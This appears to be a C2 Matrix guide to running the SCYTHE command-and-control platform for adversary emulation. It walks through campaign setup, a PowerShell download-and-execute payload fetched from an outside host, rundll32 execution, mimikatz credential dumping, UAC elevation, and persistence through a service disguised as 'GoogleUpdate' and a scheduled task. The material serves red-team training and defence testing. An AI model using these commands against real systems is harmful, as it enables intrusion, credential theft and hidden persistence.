C2 Matrix
  • The C2 Matrix
  • About
  • SANS Slingshot C2 Matrix VM
  • Contribute
  • Feedback
  • Lab Infrastructure
    • C2 Matrix Eval Lab
    • Basic Lab
    • Virtual Machines with C2s
    • Docker
    • Resources
  • C2
    • Caldera
    • Covenant
    • Deimos
    • Empire3
    • Empire5
    • Havoc
    • ibombshell
    • Koadic
    • Merlin
    • Mythic
    • Nuages
    • PoshC2
    • PowerHub
    • SilentTrinity
    • Sliver
    • SCYTHE
    • TrevorC2
  • Attack Infrastructure
    • Resources
    • Redirectors/Relays
  • Detection
    • Basics
    • Beacons
    • JA3/JA3S Hashes
    • JARM
Powered by GitBook
On this page
  • Setup Campaign
  • Community Threats (Third Party Adversary Emulation Plans)
  • Deploy Payload
  • User Execution: Malicious File (T1204.002):
  • Signed Binary Proxy Execution: Rundll32 (T1218.011):
  • Command and Scripting Interpreter: PowerShell (T1059.001)
  • Emulate TTPs
  • Load Python Runtime
  • Download files
  • Privilege Escalation (TA0004)
  • Credential Access (TA0006)
  • Persistence (TA0003)
  • Clean up
  • Persistence:
  • Kill agent:

Was this helpful?

  1. C2

SCYTHE

PreviousSliverNextTrevorC2

Last updated 4 years ago

Was this helpful?

Setup Campaign

Login to your SCYTHE instance via web browser. Default port is 8443.

Campaign Manager - New Campaign

Select the following options:

  • Name: unique name for the campaign

  • Target Operating System: Windows, Linux, or macOS

  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date

  • Communication Module:

    • HTTPS is default,

    • DNS, HTTP, and Stego require relays to be installed on redirector

    • Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github:

Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import

Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:

rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:

$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename" 

Download files

Move file to virtual file system

loader --load downloader 
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate 
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist 

Synatax: 
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"

Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown
https://localhost:8443
https://github.com/scythe-io/community-threats
Migrate Threats